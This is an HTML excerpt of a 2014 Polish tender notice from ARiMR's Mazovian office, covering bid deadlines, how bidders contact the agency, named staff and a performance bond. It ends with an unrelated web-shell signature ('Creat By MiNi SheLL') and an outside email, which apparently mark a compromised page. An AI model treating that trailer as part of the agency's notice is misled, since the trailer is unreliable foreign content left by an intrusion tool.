<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2014 godzina 09:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa - Mazowiecki Oddział Regionalny, Al. Jana Pawła II 70, 00-175 Warszawa - Kancelaria (pokój nr 241, II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. INFORMACJE O SPOSOBIE POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI: 
1.	Wszelkie oświadczenia, wnioski, zawiadomienia, wyjaśnienia oraz informacje Zamawiający i Wykonawcy mogą przekazywać:
	- pisemnie na adres:
AGENCJA RESTRUKTURYZACJI I MODERNIZACJI ROLNICTWA
MAZOWIECKI ODDZIAŁ REGIONALNY
Al. Jana Pawła II 70, 00-175 Warszawa
[korespondencję dostarczaną osobiście lub za pośrednictwem kuriera należy złożyć również pod wyżej wskazany adres (kancelaria pok. 241)],
- faxem na numer (22) 860 28 42,
- bądź mailem na adres: wioletta.cieslinska@arimr.gov.pl
z zastrzeżeniem ust. 2 niniejszego rozdz.
2.	Forma pisemna - jako jedyna dopuszczalna - zastrzeżona jest dla:
-	złożenia oferty wraz z załącznikami, 
-	złożenia dokumentów, o których mowa w art. 25 ust. 1 ustawy Pzp, składanych zarówno jako załączniki do oferty, jak i w odpowiedzi na wezwanie Zamawiającego do uzupełnienia dokumentów,
-	zmiany lub wycofania oferty.
3.	Jeżeli Zamawiający lub Wykonawca przekazują dokumenty lub informacje faksem lub 
e-mailem każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
4.	Osobami uprawnionymi do kontaktów z Wykonawcami są:
- Wioletta Cieślińska - w sprawie procedury przetargowej 
Tel (22) 536 57 40 w godzinach: od 7.30 do 15.30
- Magdalena Nasiłowska - w sprawie procedury przetargowej 
Tel. (22) 536 58 47 w godzinach: od 7.30 do 15.30
- Waldemar Kiszka - w sprawach przedmiotu zamówienia 
Tel. (22) 536 59 47, kom. 661 781 387, w godzinach: od 7.30 do 15.30. 
II. WYMAGANIA DOTYCZĄCE ZABEZPIECZENIA NALEŻYTEGO WYKONANIA UMOWY: 
1.	Warunkiem podpisania umowy jest wniesienie, najpóźniej w dniu podpisania umowy, przez Wykonawcę wyłonionego w postępowaniu, zabezpieczenia należytego wykonania umowy 
w wysokości 5% łącznej wartości brutto umowy.
2.	Zabezpieczenie należytego wykonania umowy może zostać wniesione w formach przewidzianych w art. 148 ust. 1 ustawy Pzp.
3.	W przypadku wniesienia zabezpieczenia należytego wykonania umowy w pieniądzu, wpłaty należy dokonać na konto BGK nr 27 1130 1017 0000 3160 0020 0064. Umowa zostanie zawarta, gdy zabezpieczenie należytego wykonania umowy wniesione w pieniądzu znajdzie się na koncie Zamawiającego.
4.	W przypadku wniesienia zabezpieczenia należytego wykonania umowy w formie gwarancji 
i poręczeń przewidzianych w art. 148 ustawy Pzp, Zamawiający zastrzega sobie prawo do akceptacji projektu tych dokumentów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com